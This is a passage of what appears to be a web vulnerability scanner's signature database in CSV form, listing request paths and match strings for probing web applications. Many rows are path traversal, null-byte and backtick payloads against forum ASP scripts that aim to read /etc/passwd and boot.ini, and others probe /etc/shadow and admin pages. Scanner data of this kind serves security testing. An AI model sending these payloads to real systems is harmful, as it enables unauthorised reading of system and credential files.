"002298","3093","1","/bin/common/user_update_passwd.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002299","3093","1","/biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002300","3093","1","/biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002301","3093","1","/board/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002302","3093","1","/board/philboard_admin.asp+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002303","3093","1","/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002304","3093","1","/bugtest+/+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002305","3093","1","/caupo/admin/admin_workspace.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002306","3093","1","/ccbill/whereami.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002307","3093","1","/chat_dir/register.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002308","3093","1","/checkout_payment.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002309","3093","1","/communique.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002310","3093","1","/community/forumdisplay.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002311","3093","1","/community/index.php?analized=anything","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002312","3093","1","/community/member.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002313","3093","1","/compte.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002314","3093","1","/config/html/cnf_gi.htm","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002315","3093","1","/convert-date.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002316","3093","1","/cp/rac/nsManager.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002317","3093","3a","/CSNews.cgi?command=viewnews&database=none","GET","ENV","","","","","csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.","",""
"002318","3093","1","/csPassword.cgi?command=remove%20","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002319","3093","1","/cutenews/comments.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002320","3093","1","/cutenews/search.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002321","3093","1","/cutenews/shownews.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002322","3093","1","/Data/settings.xml+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002323","3093","1","/database/metacart.mdb+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002324","3093","1","/db.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002325","3093","1","/dbabble","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002326","3093","1","/dcp/advertiser.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002327","3093","1","/defines.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002328","3093","1","/dltclnt.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002329","3093","1","/doc/admin/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002330","3093","1","/docs/NED","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002331","3093","1","/dotproject/modules/files/index_table.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002332","3093","1","/dotproject/modules/projects/addedit.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002333","3093","1","/dotproject/modules/projects/view.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002334","3093","1","/dotproject/modules/projects/vw_files.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002335","3093","1","/dotproject/modules/tasks/addedit.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002336","3093","1","/dotproject/modules/tasks/viewgantt.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002337","3093","1","/do_map","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002338","3093","1","/do_subscribe","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002339","3093","1","/email.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002340","3093","1","/emml_email_func.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002341","3093","1","/emumail.cgi?type=.%00","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002342","3093","1","/entete.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002343","3093","1","/enteteacceuil.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002344","3093","1","/etc/shadow+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002345","3093","1","/eventcal2.php.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002346","3093","1","/ez2000/ezadmin.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002347","3093","1","/ez2000/ezboard.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002348","3093","1","/ez2000/ezman.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002349","3093","1","/faqman/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002350","3093","1","/filemanager/index.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002351","3093","1","/filemgmt/brokenfile.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002352","3093","1","/filemgmt/singlefile.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002353","3093","1","/filemgmt/viewcat.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002354","3093","1","/filemgmt/visit.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002355","3093","1","/foro/YaBB.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002356","3093","1","/forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002357","3093","1","/forum-ra.asp?n=../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002358","3093","1","/forum-ra.asp?n=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002359","3093","1","/forum-ra.asp?n=/../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002360","3093","1","/forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002361","3093","1","/forum-ra.asp?n=/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002362","3093","1","/forum-ra.asp?n=/etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002363","3093","1","/forum-ra.asp?n=c:\boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002364","3093","1","/forum-ra_professionnel.asp?n=%60/etc/passwd%60","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002365","3093","1","/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002366","3093","1","/forum-ra_professionnel.asp?n=../../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002367","3093","1","/forum-ra_professionnel.asp?n=/....../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002368","3093","1","/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002369","3093","1","/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002370","3093","1","/forum-ra_professionnel.asp?n=/../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002371","3093","1","/forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002372","3093","1","/forum-ra_professionnel.asp?n=/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002373","3093","1","/forum-ra_professionnel.asp?n=/etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002374","3093","1","/forum-ra_professionnel.asp?n=c:\boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002375","3093","1","/forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002376","3093","1","/forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002377","3093","1","/forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002378","3093","1","/forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002379","3093","1","/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002380","3093","1","/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002381","3093","1","/forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002382","3093","1","/forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002383","3093","1","/forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002384","3093","1","/forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002385","3093","1","/forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002386","3093","1","/forum/mainfile.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002387","3093","1","/forum/member.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002388","3093","1","/forum/newreply.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002389","3093","1","/forum/newthread.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002390","3093","b","/forum/viewtopic.php","GET","200","","","","","phpBB found.","",""
"002391","3093","1","/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002392","3093","1","/forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002393","3093","1","/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002394","3093","1","/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002395","3093","1","/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002396","3093","1","/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002397","3093","1","/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002398","3093","1","/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002399","3093","1","/forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002400","3093","1","/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002401","3093","1","/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002402","3093","1","/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002403","3093","1","/forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002404","3093","1","/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002405","3093","1","/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002406","3093","1","/forum1.asp?n=1753&amp;nn=/....../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002407","3093","1","/forum1.asp?n=1753&amp;nn=/..../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002408","3093","1","/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002409","3093","1","/forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002410","3093","1","/forum1.asp?n=1753&amp;nn=/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002411","3093","1","/forum1.asp?n=1753&amp;nn=/etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002412","3093","1","/forum1.asp?n=1753&amp;nn=c:\boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002413","3093","1","/forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002414","3093","1","/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002415","3093","1","/forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002416","3093","1","/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002417","3093","1","/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002418","3093","1","/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002419","3093","1","/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002420","3093","1","/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002421","3093","1","/forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002422","3093","1","/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002423","3093","1","/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002424","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002425","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002426","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002427","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002428","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002429","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002430","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002431","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002432","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002433","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002434","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002435","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002436","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002437","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002438","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002439","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002440","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002441","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002442","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002443","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002444","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002445","3093","1","/forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002446","3093","1","/forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002447","3093","1","/forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002448","3093","1","/forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002449","3093","1","/forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002450","3093","1","/forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002451","3093","1","/forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002452","3093","1","/forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002453","3093","1","/forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002454","3093","1","/forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002455","3093","1","/forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002456","3093","1","/forum_arc.asp?n=268","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002457","3093","1","/forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002458","3093","1","/forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002459","3093","1","/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002460","3093","1","/forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
